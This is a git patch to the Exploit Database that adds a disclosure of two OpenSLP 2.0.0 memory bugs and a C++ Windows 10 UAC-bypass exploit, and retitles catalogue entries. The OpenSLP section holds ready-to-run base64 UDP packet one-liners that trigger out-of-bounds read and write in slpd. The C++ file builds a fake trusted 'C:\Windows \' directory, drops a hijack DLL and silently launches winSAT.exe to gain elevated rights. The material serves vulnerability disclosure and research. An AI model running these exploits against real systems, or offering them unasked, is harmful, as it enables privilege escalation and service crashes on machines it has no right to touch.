From 925e6e06293399cb7e593a105b000326a2487230 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sat, 10 Nov 2018 05:01:40 +0000 Subject: [PATCH] DB: 2018-11-10 2 changes to exploits/shellcodes Windows 10 (x86/x64) WLAN AutoConfig - Denial of Service (PoC) Microsoft Windows 10 (x86/x64) - WLAN AutoConfig Denial of Service (PoC) Windows 10 - Desktop Bridge Activation Arbitrary Directory Creation Privilege Escalation Windows 10 - Desktop Bridge Virtual Registry CVE-2018-0880 Incomplete Fix Privilege Escalation Microsoft Windows 10 - Desktop Bridge Activation Arbitrary Directory Creation Privilege Escalation Microsoft Windows 10 - Desktop Bridge Virtual Registry CVE-2018-0880 Incomplete Fix Privilege Escalation openslp 2.0.0 - Double-Free OpenSLP 2.0.0 - Double-Free Windows Speech Recognition - Buffer Overflow (PoC) Microsoft Windows Speech Recognition - Buffer Overflow (PoC) Microsoft Windows Utility Manager - Local SYSTEM (MS04-011) Microsoft Windows Utility Manager - Local Privilege Escalation (MS04-011) Windows Firewall Control - Unquoted Service Path Privilege Escalation Microsoft Windows Firewall Control - Unquoted Service Path Privilege Escalation Windows DVD Maker 6.1.7 - XML External Entity Injection Microsoft Windows DVD Maker 6.1.7 - XML External Entity Injection Windows - UAC Protection Bypass via FodHelper Registry Key (Metasploit) Microsoft Windows - UAC Protection Bypass via FodHelper Registry Key (Metasploit) Microsoft Windows 10 Creators Update (version 1703) (x86) - 'WARBIRD' 'NtQuerySystemInformation ' Kernel Local Privilege Escalation Microsoft Windows 10 (Build 1703 Creators Update) (x86) - 'WARBIRD' 'NtQuerySystemInformation ' Kernel Local Privilege Escalation Microsoft Window Manager (Windows 7 x86) - Menu Management Component UAF Privilege Elevation Microsoft Windows Manager (Windows 7 x86) - Menu Management Component UAF Privilege Elevation Windows 10 Diagnostics Hub Standard Collector Service - Privilege Escalation Microsoft Windows 10 - Diagnostics Hub Standard Collector Service Privilege Escalation Windows - SetImeInfoEx Win32k NULL Pointer Dereference (Metasploit) Microsoft Windows - SetImeInfoEx Win32k NULL Pointer Dereference (Metasploit) OpenSLP 2.0.0 - Multiple Vulnerabilities Microsoft Windows 10 (Build 17134) - Local Privilege Escalation (UAC Bypass) --- exploits/linux/local/45804.txt | 264 +++++++++++++++++++++++++++++++ exploits/windows/local/45805.cpp | 37 +++++ files_exploits.csv | 28 ++-- 3 files changed, 316 insertions(+), 13 deletions(-) create mode 100644 exploits/linux/local/45804.txt create mode 100644 exploits/windows/local/45805.cpp diff --git a/exploits/linux/local/45804.txt b/exploits/linux/local/45804.txt new file mode 100644 index 000000000..7cdd89ef1 --- /dev/null +++ b/exploits/linux/local/45804.txt @@ -0,0 +1,264 @@ + + _ _ + / | ___ ___ ___ ___ ___| |___ + _ / / | . | . | -_| |_ -| | . | +|_|_/ |___| _|___|_|_|___|_| _| + |_| |_| + +2018-11-07 + +MORE BUGS IN OPENSLP-2.0.0 +========================== + +I discovered some bugs in openslp-2.0.0 back in January, 2018. +One of them I disclosed in June (dumpco.re/blog/openslp-2.0.0-double-free), +and today I'm disclosing two more. + + +BUG 1 +===== + +This issue is an OOB read that does not crash the application. +So in terms of exploitation it is not very interesting. If that's what +you're here for then scroll down to bug#2. +After the occurence of the bug the application actually detects the error +and ignores the malicious packet. Therefore, it could be argued that this +is not a bug at all. Nevertheless, here it is: + +Proof of concept exploit: + + echo -n "AgMAAAAAAAAAAAAAAAAAAPQAATEAAAAAB2VuAAAAF3M=" | base64 -d > /dev/udp/127.0.0.1/427 + +Valgrind report: + + ==27968== Invalid read of size 1 + ==27968== at 0x412436: GetUINT16 (slp_message.c:63) + ==27968== by 0x4159C7: v2ParseSrvReg (slp_v2message.c:327) + ==27968== by 0x4159C7: SLPv2MessageParseBuffer (slp_v2message.c:1005) + ==27968== by 0x40BF4A: SLPDProcessMessage (slpd_process.c:1393) + ==27968== by 0x407139: IncomingDatagramRead (slpd_incoming.c:95) + ==27968== by 0x407139: SLPDIncomingHandler (slpd_incoming.c:420) + ==27968== by 0x40256B: main (slpd_main.c:699) + ==27968== Address 0x5b5c3f1 is 0 bytes after a block of size 81 alloc'd + ==27968== at 0x4C28C20: malloc (vg_replace_malloc.c:296) + ==27968== by 0x40FC1C: SLPBufferAlloc (slp_buffer.c:67) + ==27968== by 0x40FCBA: SLPBufferDup (slp_buffer.c:139) + ==27968== by 0x40BF7F: SLPDProcessMessage (slpd_process.c:1383) + ==27968== by 0x407139: IncomingDatagramRead (slpd_incoming.c:95) + ==27968== by 0x407139: SLPDIncomingHandler (slpd_incoming.c:420) + ==27968== by 0x40256B: main (slpd_main.c:699) + +Analysis: + +v2ParseSrvReg is responsible for parsing incoming requests. Various bytes +are read from the packet and interpreted as integers used as length fields. +One of them is the scopelistlen, parsed on line 321, and further used as +argument for the amount of bytes to increment the buffer->curpos pointer +in the the GetStrPtr function, shown below on line 112. It now points to +uninitialized memory. + +The OOB read occurs in GetUINT16, called on line 327 where the buffer->curpos +pointer is dereferenced. + +Subsequently the comparison on line 329 evaluates to true since the +buffer->curpos now points to memory located after the buffer->end +pointer. The application therefore stops processing the malicious packet. + + 291 static int v2ParseSrvReg(SLPBuffer buffer, SLPSrvReg * srvreg) + 292 { + 293 int result; + 294 + 295 /* 0 1 2 3 + 296 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 + 297 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ + 298 | \ + 299 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ + 300 | length of service type string | \ + 301 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ + 302 | length of | \ + 303 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ + 304 | length of attr-list string | \ + 305 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ + 306 |# of AttrAuths |(if present) Attribute Authentication Blocks...\ + 307 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ */ + 308 + 309 /* Parse the . */ + 310 result = v2ParseUrlEntry(buffer, &srvreg->urlentry); + 311 if (result != 0) + 312 return result; + 313 + 314 /* Parse the string. */ + 315 srvreg->srvtypelen = GetUINT16(&buffer->curpos); + 316 srvreg->srvtype = GetStrPtr(&buffer->curpos, srvreg->srvtypelen); + 317 if (buffer->curpos > buffer->end) + 318 return SLP_ERROR_PARSE_ERROR; + 319 + 320 /* Parse the string. */ + 321 srvreg->scopelistlen = GetUINT16(&buffer->curpos); + 322 srvreg->scopelist = GetStrPtr(&buffer->curpos, srvreg->scopelistlen); + 323 if (buffer->curpos > buffer->end) + 324 return SLP_ERROR_PARSE_ERROR; + 325 + 326 /* Parse the string. */ + 327 srvreg->attrlistlen = GetUINT16(&buffer->curpos); + 328 srvreg->attrlist = GetStrPtr(&buffer->curpos, srvreg->attrlistlen); + 329 if (buffer->curpos > buffer->end) + 330 return SLP_ERROR_PARSE_ERROR; + + 54 /** Extract a 16-bit big-endian buffer value into a native 16-bit word. + 55 * + 56 * @param[in,out] cpp - The address of a pointer from which to extract. + 57 * + 58 * @return A 16-bit unsigned value in native format; the buffer pointer + 59 * is moved ahead by 2 bytes on return. + 60 */ + 61 uint16_t GetUINT16(uint8_t ** cpp) + 62 { + 63 uint16_t rv = AS_UINT16(*cpp); + 64 *cpp += 2; + 65 return rv; + 66 } + ... + 96 /** Extract a string buffer address into a character pointer. + 97 * + 98 * Note that this routine doesn't actually copy the string. It only casts + 99 * the buffer pointer to a character pointer and moves the value at @p cpp + 100 * ahead by @p len bytes. + 101 * + 102 * @param[in,out] cpp - The address of a pointer from which to extract. + 103 * @param[in] len - The length of the string to extract. + 104 * + 105 * @return A pointer to the first character at the address pointed to by + 106 * @p cppstring pointer; the buffer pointer is moved ahead by @p len bytes + 107 * on return. + 108 */ + 109 char * GetStrPtr(uint8_t ** cpp, size_t len) + 110 { + 111 char * sp = (char *)*cpp; + 112 *cpp += len; + 113 return sp; + 114 } + + +Proof of discovery: + + $ echo -n "AgMAAAAAAAAAAAAAAAAAAPQAATEAAAAAB2VuAAAAF3M=" | base64 -d | sha256sum + 0d3f7a6e45a59def9097db4f103f95e4af2560bdb25853f9ee1c2e758c7d4946 - + +twitter.com/magnusstubman/status/953909628622069760 + + +Patch: + +I'm not aware of any patch, and I'm not sure the maintainers are going to patch it. + +BUG 2 +===== + +First and foremost, I'm not claiming credit for this bug since it was +apparently discovered by Reno Robert and publicly disclosed on the +oss-security mailing list on 2016-09-27 and awarded CVE-2016-7567 +the day after. + +openwall.com/lists/oss-security/2016/09/27/4 +openwall.com/lists/oss-security/2016/09/28/1 + +Anyhow, I wasn't aware of the issue and found it by fuzzing, so I +reported it to the maintainers who made me aware of the earlier discovery. +What puzzled me was that no announcement had been made and the fact that +the latest stable version on their website is still vulnerable! I found it +2017-12-06 and reported it 2018-01-18. See further down for proof of +discovery. + +I havn't been able to find any exploit for this bug anywhere. Therefore, +I'm today disclosing a proof-of-concept exploit for the bug to increase +attention on the issue. + +Exploit: + + echo -n "AgkAAA8AAAAAAJuiAAAAAAAAAJtkaXJlYwB/ACssZVJlblxkZQkJCAkJ8wkJCQkJCYAJCQkJCWF0CQlkCQBkLCwsLEUsLCwsLCwsLCwsLCwsLCwsSCwsLCwsLIAsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCysLCwsLCwAAAPoLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCxcZGUJCQgJCfMJCQkJCQkJCQkJCQlhdAkJZAkAZCwsLCwsLCwsLCwsLA==" | base64 -d > /dev/udp/127.0.0.1/427 + +Valgrind report: + + ==56913== Invalid write of size 1 + ==56913== at 0x4C2D6A3: memcpy@GLIBC_2.2.5 (vg_replace_strmem.c:914) + ==56913== by 0x40FD0B: SLPFoldWhiteSpace (slp_compare.c:210) + ==56913== by 0x4100DC: SLPCompareString (slp_compare.c:374) + ==56913== by 0x410331: SLPContainsStringList (slp_compare.c:514) + ==56913== by 0x4103C6: SLPIntersectStringList (slp_compare.c:550) + ==56913== by 0x40C606: ProcessSrvTypeRqst (slpd_process.c:1220) + ==56913== by 0x40C606: SLPDProcessMessage (slpd_process.c:1431) + ==56913== by 0x406F69: IncomingDatagramRead (slpd_incoming.c:94) + ==56913== by 0x406F69: SLPDIncomingHandler (slpd_incoming.c:406) + ==56913== by 0x402383: main (slpd_main.c:699) + ==56913== Address 0x5b5dd06 is 0 bytes after a block of size 6 alloc'd + ==56913== at 0x4C28C20: malloc (vg_replace_malloc.c:296) + ==56913== by 0x415C51: _xmemdup (slp_xmalloc.c:356) + ==56913== by 0x410096: SLPCompareString (slp_compare.c:365) + ==56913== by 0x410331: SLPContainsStringList (slp_compare.c:514) + ==56913== by 0x4103C6: SLPIntersectStringList (slp_compare.c:550) + ==56913== by 0x40C606: ProcessSrvTypeRqst (slpd_process.c:1220) + ==56913== by 0x40C606: SLPDProcessMessage (slpd_process.c:1431) + ==56913== by 0x406F69: IncomingDatagramRead (slpd_incoming.c:94) + ==56913== by 0x406F69: SLPDIncomingHandler (slpd_incoming.c:406) + ==56913== by 0x402383: main (slpd_main.c:699) + +The while loop on line 207 fails to perform bounds checking, and as such +may end up incrementing the pointer p up to a point such that p is bigger +than ep. Thus, the third argument to memmove on line 2010 becomes negative. +However, since memmove accepts a size_t (which is unsigned) the value wraps +around and becomes UINT_MAX or close to UINT_MAX resulting in memmove +attempting to move an excessive amount of memory, resulting in OOB write. + + 184 /** fold internal white space within a string. + 185 * + 186 * folds all internal white space to a single space character within a + 187 * specified string. modified the @p str parameter with the result and + 188 * returns the new length of the string. + 189 * + 190 * @param[in] len - the length in bytes of @p str. + 191 * @param[in,out] str - the string from which extraneous white space + 192 * should be removed. + 193 * + 194 * @return the new (shorter) length of @p str. + 195 * + 196 * @note this routine assumes that leading and trailing white space have + 197 * already been removed from @p str. + 198 */ + 199 static int slpfoldwhitespace(size_t len, char * str) + 200 { + 201 char * p = str, * ep = str + len; + 202 while (p < ep) + 203 { + 204 if (isspace(*p)) + 205 { + 206 char * ws2p = ++p; /* point ws2p to the second ws char. */ + 207 while (isspace(*p)) /* scan till we hit a non-ws char. */ + 208 p++; + 209 len -= p - ws2p; /* reduce the length by extra ws. */ + 210 memmove(ws2p, p, ep - p); /* overwrite the extra white space. */ + 211 } + 212 p++; + 213 } + 214 return (int)len; + 215 } + +Proof of discovery: + + $ echo -n "AgkAAA8AAAAAAJuiAAAAAAAAAJtkaXJlYwB/ACssZVJlblxkZQkJCAkJ8wkJCQkJCYAJCQkJCWF0CQlkCQBkLCwsLEUsLCwsLCwsLCwsLCwsLCwsSCwsLCwsLIAsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCysLCwsLCwAAAPoLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCxcZGUJCQgJCfMJCQkJCQkJCQkJCQlhdAkJZAkAZCwsLCwsLCwsLCwsLA==" | base64 -d | sha256sum + 5bba9f9410bd4dffa4dc119477153002002db3fdd26a97080e43bfd95aeadb24 - + +twitter.com/magnusstubman/status/938317849474555904 + +Patch: sourceforge.net/p/openslp/mercurial/ci/34fb3aa5e6b4997fa21cb614e480de36da5dbc9a + +REFERENCES +========== + +- sourceforge.net/p/openslp/bugs/161 +- sourceforge.net/p/openslp/bugs/160 +- twitter.com/magnusstubman/status/938317849474555904 +- twitter.com/magnusstubman/status/953909628622069760 +- sourceforge.net/p/openslp/mercurial/ci/34fb3aa5e6b4997fa21cb614e480de36da5dbc9a +- openwall.com/lists/oss-security/2016/09/27/4 +- openwall.com/lists/oss-security/2016/09/28/1 \ No newline at end of file diff --git a/exploits/windows/local/45805.cpp b/exploits/windows/local/45805.cpp new file mode 100644 index 000000000..14d0b457f --- /dev/null +++ b/exploits/windows/local/45805.cpp @@ -0,0 +1,37 @@ +#include "stdafx.h" +#include +#include "resource.h" + +void DropResource(const wchar_t* rsrcName, const wchar_t* filePath) { + HMODULE hMod = GetModuleHandle(NULL); + HRSRC res = FindResource(hMod, MAKEINTRESOURCE(IDR_DATA1), rsrcName); + DWORD dllSize = SizeofResource(hMod, res); + void* dllBuff = LoadResource(hMod, res); + HANDLE hDll = CreateFile(filePath, GENERIC_WRITE, 0, 0, CREATE_ALWAYS, 0, NULL); + DWORD sizeOut; + WriteFile(hDll, dllBuff, dllSize, &sizeOut, NULL); + CloseHandle(hDll); +} + +int main() +{ + _SHELLEXECUTEINFOW se = {}; + //Create Mock SystemRoot Directory + CreateDirectoryW(L"\\\\?\\C:\\Windows \\", 0); + CreateDirectoryW(L"\\\\?\\C:\\Windows \\System32", 0); + CopyFileW(L"C:\\Windows\\System32\\winSAT.exe", L"\\\\?\\C:\\Windows \\System32\\winSAT.exe", false); + + //Drop our dll for hijack + DropResource(L"DATA", L"\\\\?\\C:\\Windows \\System32\\WINMM.dll"); + + //Execute our winSAT.exe copy from fake trusted directory + se.cbSize = sizeof(_SHELLEXECUTEINFOW); + se.lpFile = L"C:\\Windows \\System32\\winSAT.exe"; + se.lpParameters = L"formal"; + se.nShow = SW_HIDE; + se.hwnd = NULL; + se.lpDirectory = NULL; + ShellExecuteEx(&se); + + return 0; +} \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 53e302562..4d798b04a 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -5337,7 +5337,7 @@ id,file,description,date,author,type,platform,port 40878,exploits/windows/dos/40878.txt,"Microsoft Edge - CMarkup::Ensure­Delete­CFState Use-After-Free (MS15-125)",2016-12-06,Skylined,dos,windows, 40879,exploits/windows/dos/40879.html,"Microsoft Internet Explorer 9 - CDoc::Execute­Script­Uri Use-After-Free (MS13-009)",2016-12-06,Skylined,dos,windows, 40880,exploits/windows/dos/40880.txt,"Microsoft Edge - CBase­Scriptable::Private­Query­Interface Memory Corruption (MS16-068)",2016-12-06,Skylined,dos,windows, -40883,exploits/windows/dos/40883.py,"Windows 10 (x86/x64) WLAN AutoConfig - Denial of Service (PoC)",2016-12-06,"Jeremy Brown",dos,windows, +40883,exploits/windows/dos/40883.py,"Microsoft Windows 10 (x86/x64) - WLAN AutoConfig Denial of Service (PoC)",2016-12-06,"Jeremy Brown",dos,windows, 40885,exploits/windows/dos/40885.py,"Dual DHCP DNS Server 7.29 - Denial of Service",2016-12-07,R-73eN,dos,windows, 40886,exploits/hardware/dos/40886.py,"TP-LINK TD-W8951ND - Denial of Service",2016-12-07,"Persian Hack Team",dos,hardware, 40888,exploits/linux/dos/40888.py,"OpenSSH 7.2 - Denial of Service",2016-12-07,"SecPod Research",dos,linux, @@ -6004,8 +6004,8 @@ id,file,description,date,author,type,platform,port 44894,exploits/linux/dos/44894.py,"rtorrent 0.9.6 - Denial of Service",2018-06-14,ecx86,dos,linux, 44908,exploits/linux/dos/44908.txt,"Redis 5.0 - Denial of Service",2018-06-20,"Fakhri Zulkifli",dos,linux, 44909,exploits/linux/dos/44909.txt,"ntp 4.2.8p11 - Local Buffer Overflow (PoC)",2018-06-20,"Fakhri Zulkifli",dos,linux, -44914,exploits/windows/dos/44914.txt,"Windows 10 - Desktop Bridge Activation Arbitrary Directory Creation Privilege Escalation",2018-06-20,"Google Security Research",dos,windows, -44915,exploits/windows/dos/44915.txt,"Windows 10 - Desktop Bridge Virtual Registry CVE-2018-0880 Incomplete Fix Privilege Escalation",2018-06-20,"Google Security Research",dos,windows, +44914,exploits/windows/dos/44914.txt,"Microsoft Windows 10 - Desktop Bridge Activation Arbitrary Directory Creation Privilege Escalation",2018-06-20,"Google Security Research",dos,windows, +44915,exploits/windows/dos/44915.txt,"Microsoft Windows 10 - Desktop Bridge Virtual Registry CVE-2018-0880 Incomplete Fix Privilege Escalation",2018-06-20,"Google Security Research",dos,windows, 44925,exploits/linux/dos/44925.txt,"QEMU Guest Agent 2.12.50 - Denial of Service",2018-06-22,"Fakhri Zulkifli",dos,linux, 44927,exploits/php/dos/44927.pl,"Opencart < 3.0.2.0 - Denial of Service",2018-06-22,"Todor Donev",dos,php,80 44934,exploits/hardware/dos/44934.txt,"DIGISOL DG-BR4000NG - Buffer Overflow (PoC)",2018-06-25,"Adipta Basu",dos,hardware, @@ -6013,7 +6013,7 @@ id,file,description,date,author,type,platform,port 44962,exploits/linux/dos/44962.txt,"SIPp 3.6 - Local Buffer Overflow (PoC)",2018-07-02,"Fakhri Zulkifli",dos,linux, 44965,exploits/hardware/dos/44965.py,"Delta Industrial Automation COMMGR 1.08 - Stack Buffer Overflow (PoC)",2018-07-02,t4rkd3vilz,dos,hardware,80 45106,exploits/linux/dos/45106.c,"fusermount - user_allow_other Restriction Bypass and SELinux Label Control",2018-07-30,"Google Security Research",dos,linux, -44972,exploits/linux/dos/44972.py,"openslp 2.0.0 - Double-Free",2018-07-03,"Magnus Klaaborg Stubman",dos,linux, +44972,exploits/linux/dos/44972.py,"OpenSLP 2.0.0 - Double-Free",2018-07-03,"Magnus Klaaborg Stubman",dos,linux, 44994,exploits/linux/dos/44994.html,"Tor Browser < 0.3.2.10 - Use After Free (PoC)",2018-07-09,t4rkd3vilz,dos,linux, 45011,exploits/windows/dos/45011.js,"Microsoft Edge Chakra JIT - Out-of-Bounds Reads/Writes",2018-07-12,"Google Security Research",dos,windows, 45012,exploits/windows/dos/45012.js,"Microsoft Edge Chakra JIT - BoundFunction::NewInstance Out-of-Bounds Read",2018-07-12,"Google Security Research",dos,windows, @@ -6026,7 +6026,7 @@ id,file,description,date,author,type,platform,port 45061,exploits/multiple/dos/45061.html,"Google Chrome - SwiftShader OpenGL Texture Bindings Reference Count Leak",2018-07-19,"Google Security Research",dos,multiple, 45064,exploits/hardware/dos/45064.txt,"TP-Link TL-WR840N - Denial of Service",2018-07-20,"Aniket Dinda",dos,hardware, 45082,exploits/linux/dos/45082.txt,"Nagios Core 4.4.1 - Denial of Service",2018-07-24,"Fakhri Zulkifli",dos,linux, -45077,exploits/windows/dos/45077.txt,"Windows Speech Recognition - Buffer Overflow (PoC)",2018-07-23,"Nassim Asrir",dos,windows, +45077,exploits/windows/dos/45077.txt,"Microsoft Windows Speech Recognition - Buffer Overflow (PoC)",2018-07-23,"Nassim Asrir",dos,windows, 45087,exploits/windows/dos/45087.py,"GetGo Download Manager 6.2.1.3200 - Denial of Service (PoC)",2018-07-25,"Nathu Nandwani",dos,windows, 45091,exploits/windows/dos/45091.py,"Core FTP 2.0 - 'XRMD' Denial of Service (PoC)",2018-07-26,"Erik David Martin",dos,windows, 45092,exploits/windows/dos/45092.py,"QNap QVR Client 5.1.1.30070 - 'Password' Denial of Service (PoC)",2018-07-27,"Luis Martínez",dos,windows, @@ -6258,7 +6258,7 @@ id,file,description,date,author,type,platform,port 261,exploits/sco/local/261.c,"SCO OpenServer 5.0.5 - Env Local Stack Overflow",2001-01-26,K2,local,sco, 265,exploits/irix/local/265.sh,"IRIX 5.3/6.2/6.3/6.4/6.5/6.5.11 - '/usr/bin/lpstat' Local Overflow / Local Privilege Escalation",2001-05-07,LSD-PLaNET,local,irix, 270,exploits/irix/local/270.sh,"IRIX 5.3/6.2/6.3/6.4/6.5/6.5.11 - '/usr/lib/print/netprint' Local Privilege Escalation",2001-05-08,LSD-PLaNET,local,irix, -271,exploits/windows/local/271.c,"Microsoft Windows Utility Manager - Local SYSTEM (MS04-011)",2004-04-15,"Cesar Cerrudo",local,windows, +271,exploits/windows/local/271.c,"Microsoft Windows Utility Manager - Local Privilege Escalation (MS04-011)",2004-04-15,"Cesar Cerrudo",local,windows, 272,exploits/windows/local/272.c,"WinZip - MIME Parsing Overflow",2004-04-15,snooq,local,windows, 273,exploits/linux/local/273.c,"SquirrelMail - 'chpasswd' Local Buffer Overflow",2004-04-20,x314,local,linux, 281,exploits/tru64/local/281.c,"Tru64 UNIX 4.0g - '/usr/bin/at' Local Privilege Escalation",2001-03-02,"Cody Tubbs",local,tru64, @@ -9489,7 +9489,7 @@ id,file,description,date,author,type,platform,port 40330,exploits/windows/local/40330.py,"FortiClient SSLVPN 5.4 - Credentials Disclosure",2016-09-01,"Viktor Minin",local,windows, 40438,exploits/windows/local/40438.txt,"Glassfish Server - Unquoted Service Path Privilege Escalation",2016-09-28,s0nk3y,local,windows, 40442,exploits/windows/local/40442.txt,"NETGEAR Genie 2.4.32 - Unquoted Service Path Privilege Escalation",2016-09-30,Tulpa,local,windows, -40443,exploits/windows/local/40443.txt,"Windows Firewall Control - Unquoted Service Path Privilege Escalation",2016-10-03,zaeek,local,windows, +40443,exploits/windows/local/40443.txt,"Microsoft Windows Firewall Control - Unquoted Service Path Privilege Escalation",2016-10-03,zaeek,local,windows, 40450,exploits/linux/local/40450.txt,"Apache Tomcat 8/7/6 (Debian-Based Distros) - Local Privilege Escalation",2016-10-03,"Dawid Golunski",local,linux, 40451,exploits/windows_x86-64/local/40451.rb,"Street Fighter 5 - 'Capcom.sys' Kernel Execution (Metasploit)",2016-10-03,"OJ Reeves",local,windows_x86-64, 40460,exploits/windows/local/40460.txt,"Abyss Web Server X1 2.11.1 - Unquoted Service Path Privilege Escalation",2016-10-05,Tulpa,local,windows, @@ -9630,7 +9630,7 @@ id,file,description,date,author,type,platform,port 41597,exploits/linux/local/41597.txt,"Oracle VM VirtualBox - Cooperating VMs can Escape from Shared Folder",2017-03-13,"Google Security Research",local,linux, 41605,exploits/windows_x86-64/local/41605.txt,"PCAUSA Rawether (ASUS PCE-AC56 WLAN Card Utilities Windows 10 x64) - Local Privilege Escalation",2017-03-15,ReWolf,local,windows_x86-64, 41607,exploits/windows/local/41607.cs,"Microsoft Windows - COM Session Moniker Privilege Escalation (MS17-012)",2017-03-15,"Google Security Research",local,windows, -41619,exploits/windows/local/41619.txt,"Windows DVD Maker 6.1.7 - XML External Entity Injection",2017-03-16,hyp3rlinx,local,windows, +41619,exploits/windows/local/41619.txt,"Microsoft Windows DVD Maker 6.1.7 - XML External Entity Injection",2017-03-16,hyp3rlinx,local,windows, 43359,exploits/linux/local/43359.c,"Firejail < 0.9.44.4 / < 0.9.38.8 LTS - Local Sandbox Escape",2017-01-04,"Sebastian Krahmer",local,linux, 43366,exploits/windows/local/43366.md,"TeamViewer 11 < 13 (Windows 10 x86) - Inline Hooking / Direct Memory Modification Permission Change",2017-12-04,gellin,local,windows, 43390,exploits/windows/local/43390.txt,"Ubiquiti UniFi Video 3.7.3 - Local Privilege Escalation",2017-12-26,"Julien Ahrens",local,windows, @@ -9734,7 +9734,7 @@ id,file,description,date,author,type,platform,port 42119,exploits/windows/local/42119.txt,"Subsonic 6.1.1 - XML External Entity Injection",2017-06-05,hyp3rlinx,local,windows, 42121,exploits/windows/local/42121.txt,"BIND 9.10.5 - Unquoted Service Path Privilege Escalation",2017-06-05,hyp3rlinx,local,windows, 42141,exploits/windows/local/42141.txt,"Net Monitor for Employees Pro < 5.3.4 - Unquoted Service Path Privilege Escalation",2017-06-08,"Saeid Atabaki",local,windows, -42142,exploits/windows/local/42142.rb,"Windows - UAC Protection Bypass via FodHelper Registry Key (Metasploit)",2017-06-08,Metasploit,local,windows, +42142,exploits/windows/local/42142.rb,"Microsoft Windows - UAC Protection Bypass via FodHelper Registry Key (Metasploit)",2017-06-08,Metasploit,local,windows, 42145,exploits/multiple/local/42145.c,"Apple macOS 10.12.3 / iOS < 10.3.2 - Userspace Entitlement Checking Race Condition",2017-06-09,"Google Security Research",local,multiple, 42146,exploits/macos/local/42146.sh,"Apple macOS - Disk Arbitration Daemon Race Condition",2017-06-09,phoenhex,local,macos, 42157,exploits/windows/local/42157.py,"Disk Sorter 9.7.14 - 'Input Directory' Local Buffer Overflow",2017-06-10,abatchy17,local,windows, @@ -9824,7 +9824,7 @@ id,file,description,date,author,type,platform,port 43162,exploits/windows/local/43162.txt,"Microsoft Windows 10 - CiSetFileCache TOCTOU Security Feature Bypass",2017-11-20,"Google Security Research",local,windows, 43179,exploits/windows/local/43179.py,"ALLPlayer 7.5 - Local Buffer Overflow (SEH Unicode)",2017-11-25,sickness,local,windows, 43187,exploits/windows/local/43187.txt,"Diving Log 6.0 - XML External Entity Injection",2017-11-27,"Trent Gordon",local,windows, -43192,exploits/windows_x86/local/43192.c,"Microsoft Windows 10 Creators Update (version 1703) (x86) - 'WARBIRD' 'NtQuerySystemInformation ' Kernel Local Privilege Escalation",2017-11-27,XPN,local,windows_x86, +43192,exploits/windows_x86/local/43192.c,"Microsoft Windows 10 (Build 1703 Creators Update) (x86) - 'WARBIRD' 'NtQuerySystemInformation ' Kernel Local Privilege Escalation",2017-11-27,XPN,local,windows_x86, 43201,exploits/macos/local/43201.rb,"Apple macOS 10.13.1 (High Sierra) - 'Blank Root' Local Privilege Escalation (Metasploit)",2017-11-30,Metasploit,local,macos, 43216,exploits/macos/local/43216.rb,"Arq 5.9.7 - Local Privilege Escalation",2017-12-06,"Mark Wadham",local,macos, 43217,exploits/macos/local/43217.sh,"Murus 1.4.11 - Local Privilege Escalation",2017-12-06,"Mark Wadham",local,macos, @@ -9907,7 +9907,7 @@ id,file,description,date,author,type,platform,port 44475,exploits/windows/local/44475.txt,"Brave Browser < 0.13.0 - 'window.close(self)' Denial of Service",2018-04-17,"Sahil Tikoo",local,windows, 44476,exploits/windows/local/44476.py,"AMD Plays.tv 1.27.5.0 - 'plays_service.exe' Arbitrary File Execution",2018-04-15,Securifera,local,windows, 44477,exploits/windows/local/44477.py,"Reaper 5.78 - Local Buffer Overflow",2018-04-17,bzyo,local,windows, -44478,exploits/windows_x86/local/44478.cpp,"Microsoft Window Manager (Windows 7 x86) - Menu Management Component UAF Privilege Elevation",2018-03-26,xiaodaozhi,local,windows_x86, +44478,exploits/windows_x86/local/44478.cpp,"Microsoft Windows Manager (Windows 7 x86) - Menu Management Component UAF Privilege Elevation",2018-03-26,xiaodaozhi,local,windows_x86, 44479,exploits/windows_x86/local/44479.cpp,"Microsoft Windows Kernel (Windows 7 x86) - Local Privilege Escalation (MS17-017)",2018-03-15,xiaodaozhi,local,windows_x86, 44480,exploits/windows_x86/local/44480.cpp,"Microsoft Windows Kernel (Windows 7 x86) - Local Privilege Escalation (MS16-039)",2018-03-01,xiaodaozhi,local,windows_x86, 44499,exploits/windows_x86/local/44499.py,"Free Download Manager 2.0 Built 417 - Local Buffer Overflow (SEH)",2018-04-23,"Marwan Shamel",local,windows_x86, @@ -10016,7 +10016,7 @@ id,file,description,date,author,type,platform,port 45205,exploits/linux/local/45205.txt,"WebkitGTK+ 2.20.3 - 'ImageBufferCairo::getImageData()' Buffer Overflow (PoC)",2018-08-16,PeregrineX,local,linux, 45235,exploits/windows_x86/local/45235.py,"Project64 2.3.2 - Buffer Overflow (SEH)",2018-08-22,"Shubham Singh",local,windows_x86, 45243,exploits/linux/local/45243.txt,"Ghostscript - Multiple Vulnerabilities",2018-08-22,"Google Security Research",local,linux, -45244,exploits/windows/local/45244.txt,"Windows 10 Diagnostics Hub Standard Collector Service - Privilege Escalation",2018-08-22,"Atredis Partners",local,windows, +45244,exploits/windows/local/45244.txt,"Microsoft Windows 10 - Diagnostics Hub Standard Collector Service Privilege Escalation",2018-08-22,"Atredis Partners",local,windows, 45250,exploits/windows_x86/local/45250.py,"StyleWriter 4 1.0 - Denial of Service (PoC)",2018-08-23,"Gionathan Reale",local,windows_x86, 